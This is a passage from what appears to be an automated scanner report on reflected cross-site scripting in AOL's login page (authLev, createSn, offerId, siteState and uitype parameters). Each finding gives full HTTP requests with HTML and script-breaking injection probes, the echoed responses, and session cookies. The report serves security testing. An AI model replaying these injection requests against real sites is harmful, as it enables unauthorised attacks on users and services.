Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:04:23 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:04:23 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 48
Keep-Alive: timeout=15, max=227
Connection: Keep-Alive


parseCheckStatus5b302<a b=c>7fe70a0ec3a(0);


5.136. https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /_cqr/login/login.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3662</script><a>cffa8bfca76 was submitted in the authLev parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_cqr/login/login.psp?sitedomain=startpage.aol.com&authLev=0f3662</script><a>cffa8bfca76&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.aol.com%2F&lang=en&locale=us&createSn=1 HTTP/1.1
Host: my.screenname.aol.com
Connection: keep-alive
Referer: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0&lang=en&locale=us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: testcookie; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_SC=diAxLjAga2lkIDEgQVlTMUJ3VzRNZVAvUnNIclJpZGl1S2IyMDNRPQ%3D%3D-MwhW4P6%2F0%2BL6ODvOihE4Mz%2FdnNYp0U4IDrCoX8LRSmDq0RMdiaUfPoUocN3CCrqVyiLrMD9EZhdvRq7giYxAlyOjHinOlhTZ6rnw%2BAhDlDrmgnRttTTWUItbi21OuHY5; SNS_LDC=1&-&-&1304557177&1&1304557177&0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:01:25 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgZ3RrQTY1OGQ3dUkrOHU1UTFCRjUvWUkzNzZRPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnplasxXleFwX2zqxCjlprNu%2BnllaMIFy%2FIfwp0L%2BwdnBECtvBGW1GAeF%2BdlbMxXp1ILvTzec4o0clL4YtsTdUzuwEsY%2FRHgQeJSsDczbWsyA%3D%3D; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557285&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:01:25 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
ntCoent-Length: 1124
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 1124


<html>


<head>
<LINK href="https://sns-static.aolcdn.com/sns.v11r4/style/snsStyles.css" rel="stylesheet" type="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascr
...[SNIP]...
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
// goto whatever redirUrl we got
snsInFrameRedir("https://rsp.web.aol.com/rsp-websvc-3.0/snsReg?sitedomain=startpage.aol.com&authLev=0f3662</script><a>cffa8bfca76&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.aol.com%2F&lang=en&locale=us&createSn=1&regPromoCode=825349&mcAuth=%2FBcAG03B9uUAAK85AXwDHk3B9yEIXscgAquZyS8AAA%3D%3D");
</SCRIPT>
...[SNIP]...

5.137. https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /_cqr/login/login.psp

Issue detail

The value of the authLev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b939e"><a%20b%3dc>33e4aee5348 was submitted in the authLev parameter. This input was echoed as b939e"><a b=c>33e4aee5348 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /_cqr/login/login.psp?sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0b939e"><a%20b%3dc>33e4aee5348&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575004712-Repeat%7C1367647004712%3B%20s_nrgvo%3DRepeat%7C1367647004714%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:01:30 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgSXB0d3NIRDNpWXdXYUY3c2VvRFYrNkNBSVZvPQ%3D%3D-wDdtxrRQhAbF7Rd0rJLDTB1ZCVneOSlCdPg61D9WuAo4%2Bazcgge3RVwyo50Q0KK2sgATKtzEJmSAr7manTK19DM29Wds1SUTYKGRtlEUCrq%2Fn5Z9uJIInT9jnZ8krH1m; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557290&1&1304557290&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:01:30 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
ntCoent-Length: 14910
Keep-Alive: timeout=15, max=497
Connection: Keep-Alive
Content-Length: 14910


<!doctype html>


<html>
   <head>
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>

       
           <title>AOL.com - Welcome to AOL</title>

           
               <meta name="description" con
...[SNIP]...
<a href="https://account.login.aol.com/opr/_cqr/opr/opr.psp?sitedomain=startpage.aol.com&authLev=0b939e"><a b=c>33e4aee5348&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.aol.com%2F&lang=en&locale=us" tabindex="4" target="_top" id="forgot-pwd">
...[SNIP]...

5.138. https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /_cqr/login/login.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f105c"%3b05f2bbf77cb was submitted in the authLev parameter. This input was echoed as f105c";05f2bbf77cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_cqr/login/login.psp?sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0f105c"%3b05f2bbf77cb&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575004712-Repeat%7C1367647004712%3B%20s_nrgvo%3DRepeat%7C1367647004714%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:01:34 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgZXdxeW01ZUg1YVVjSUtXN01sZHBpK3l1M1o0PQ%3D%3D-se7lQTawE77ArZCWVskhrxX6IVR6FIexcRHSK7RwrD4CFe6QkVzK8h%2BNPcnyOuMhIliispcwMf0U8fFPTQQ5L9wd8wqTof50hypJ0FFTpiNfcf9Mt8Bnrxe5o8IJfQok; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557294&1&1304557294&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:01:34 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
ntCoent-Length: 14880
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 14880


<!doctype html>


<html>
   <head>
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>

       
           <title>AOL.com - Welcome to AOL</title>

           
               <meta name="description" con
...[SNIP]...
65.pfxID="sso";
s_265.pageName="sso : login";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/snsUiDriver.jsp";
s_265.prop16="startpage.aol.com";
s_265.prop17="lp";
s_265.prop18="0f105c";05f2bbf77cb";
s_265.prop19="vl6";
s_265.prop20="en-us";
s_265.prop21="AOLPortal";
s_265.prop22=".aol.com";
s_265.prop23="aol-com-jv3-en-us";
s_265.mmxgo=true;
var s_code=s_265.t();
if(s_code)document.write(s_code
...[SNIP]...

5.139. https://my.screenname.aol.com/_cqr/login/login.psp [createSn parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /_cqr/login/login.psp

Issue detail

The value of the createSn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1952a</script><a>313f9e9f0c3 was submitted in the createSn parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_cqr/login/login.psp?sitedomain=startpage.aol.com&authLev=0&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.aol.com%2F&lang=en&locale=us&createSn=11952a</script><a>313f9e9f0c3 HTTP/1.1
Host: my.screenname.aol.com
Connection: keep-alive
Referer: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0&lang=en&locale=us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: testcookie; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_SC=diAxLjAga2lkIDEgQVlTMUJ3VzRNZVAvUnNIclJpZGl1S2IyMDNRPQ%3D%3D-MwhW4P6%2F0%2BL6ODvOihE4Mz%2FdnNYp0U4IDrCoX8LRSmDq0RMdiaUfPoUocN3CCrqVyiLrMD9EZhdvRq7giYxAlyOjHinOlhTZ6rnw%2BAhDlDrmgnRttTTWUItbi21OuHY5; SNS_LDC=1&-&-&1304557177&1&1304557177&0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:01:57 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgaFp4T0pDRzZ3bWZ1akR0UWxuUFN6S1VrT2ZzPQ%3D%3D-MwhW4P6%2F0%2BL6ODvOihE4Mz%2FdnNYp0U4ILm9Rbwx8WtmmBeoRFSva4tCvYQLE5e0YRInE5XrlWX47Zx%2Fesn6jQOOzSB0CnoaINzLXxryW4waJ5Vc0pKIto%2FY1h1RmcYqF; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557317&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:01:57 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
ntCoent-Length: 14965
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 14965


<!doctype html>


<html>
   <head>
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>

       
           <title>AOL.com - Welcome to AOL</title>

           
               <meta name="description" con
...[SNIP]...
uage="javascript" type="text/javascript">
prereqchecks('/badbrowser.psp?source=login&sitedomain=startpage.aol.com&authLev=0&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.aol.com%2F&lang=en&locale=us&createSn=11952a</script><a>313f9e9f0c3');
</script>
...[SNIP]...

5.140. https://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /_cqr/login/login.psp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fd5b</script><a>09d37ffcf80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_cqr/login/login.psp?sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0&lang=en&locale=us&8fd5b</script><a>09d37ffcf80=1 HTTP/1.1
Host: my.screenname.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575004712-Repeat%7C1367647004712%3B%20s_nrgvo%3DRepeat%7C1367647004714%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:02:01 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEga1VPckdkQW41a25FM3plMDFBU2ZRTVl3dXdrPQ%3D%3D-AvLVUm%2BU30b8iQXdYfxz3No%2FJNGuXP4SsTxLPQ3sdu2sSCr1ejmSj96wM5Fb0%2F8rrIC091kjFYgtllS7Wm1wqNqoRtWzo6B7hjCOWBvTHu5GIAtNVIFf7kzxnjF6cFT%2B; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557321&1&1304557321&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:02:01 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
ntCoent-Length: 14962
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 14962


<!doctype html>


<html>
   <head>
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>

       
           <title>AOL.com - Welcome to AOL</title>

           
               <meta name="description" con
...[SNIP]...
cript language="javascript" type="text/javascript">
prereqchecks('/badbrowser.psp?source=login&sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0&lang=en&locale=us&8fd5b</script><a>09d37ffcf80=1');
</script>
...[SNIP]...

5.141. https://my.screenname.aol.com/_cqr/login/login.psp [offerId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /_cqr/login/login.psp

Issue detail

The value of the offerId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a08b</script><a>21dba1a5500 was submitted in the offerId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_cqr/login/login.psp?sitedomain=startpage.aol.com&authLev=1&siteState=http%3A%2F%2Fwww.aol.com&lang=en&locale=us&offerId=aol-com-jv3-en-us3a08b</script><a>21dba1a5500&createSn=1 HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:45 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgd0U4cWo0UVRqY1htaWtkQU9ob2FaZXdVNGJBPQ%3D%3D-MwhW4P6%2F0%2BITb%2Fn3OrP1rSoyXqmBvdBs7xKICpeTLyZk9f%2BdQcFnLJAWGUi71ABtvjy%2BXu3FdoPq37FoWufLz574HI4uqcLlI2FOKchFWyjKnU4Uoi0xAiCoZFvc6CIDNJBE2VDcI2fC%2Flz7kvUGBO5Re3MFFW8jw9wKOXrYWkF0xqpL7nYW%2BA%3D%3D; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557425&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:45 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 1139
Connection: close


<html>


<head>
<LINK href="https://sns-static.aolcdn.com/sns.v11r4/style/snsStyles.css" rel="stylesheet" type="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascr
...[SNIP]...
dirUrl we got
snsInFrameRedir("https://rsp.web.aol.com/rsp-websvc-3.0/snsReg?sitedomain=startpage.aol.com&authLev=1&siteState=http%3A%2F%2Fwww.aol.com&lang=en&locale=us&offerId=aol-com-jv3-en-us3a08b</script><a>21dba1a5500&createSn=1&regPromoCode=825349&mcAuth=%2FBcAG03B93EAAPdjAZjfI03B960IF%2BpHoxdLcLIAAA%3D%3D");
</SCRIPT>
...[SNIP]...

5.142. https://my.screenname.aol.com/_cqr/login/login.psp [siteState parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /_cqr/login/login.psp

Issue detail

The value of the siteState request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 640ea</script><a>b5726eea392 was submitted in the siteState parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_cqr/login/login.psp?sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f640ea</script><a>b5726eea392&authLev=0&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575004712-Repeat%7C1367647004712%3B%20s_nrgvo%3DRepeat%7C1367647004714%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:01:21 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgMnB0MlRWQzBoU2FmTGJQWC9mN0ZTUGpibFJBPQ%3D%3D-1n6uhHR2snl3HaEjUW3lwYahztfKdwk1mBhyZ9lpp%2B3ur%2FvqCzWsHYxANVWjEhraG%2FlyQo5smPtdZB0BvtIJkPpfEo2kRY%2Fp22oQgaEcftjxmw0ZvdpNOqgai9QbKyCs; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557281&1&1304557281&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:01:21 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
ntCoent-Length: 15073
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 15073


<!doctype html>


<html>
   <head>
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>

       
           <title>AOL.com - Welcome to AOL</title>

           
               <meta name="description" con
...[SNIP]...
<script language="javascript" type="text/javascript">
prereqchecks('/badbrowser.psp?source=login&sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f640ea</script><a>b5726eea392&authLev=0&lang=en&locale=us');
</script>
...[SNIP]...

5.143. https://my.screenname.aol.com/_cqr/login/login.psp [uitype parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://my.screenname.aol.com
Path:   /_cqr/login/login.psp

Issue detail

The value of the uitype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b037</script><a>da98342092f was submitted in the uitype parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_cqr/login/login.psp?sitedomain=aolmobile.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2faolmobile.aol.com%2fregistration%2finclude%2fsnsRefresh.jsp&authLev=0&lang=en&locale=us&uitype=popup9b037</script><a>da98342092f HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
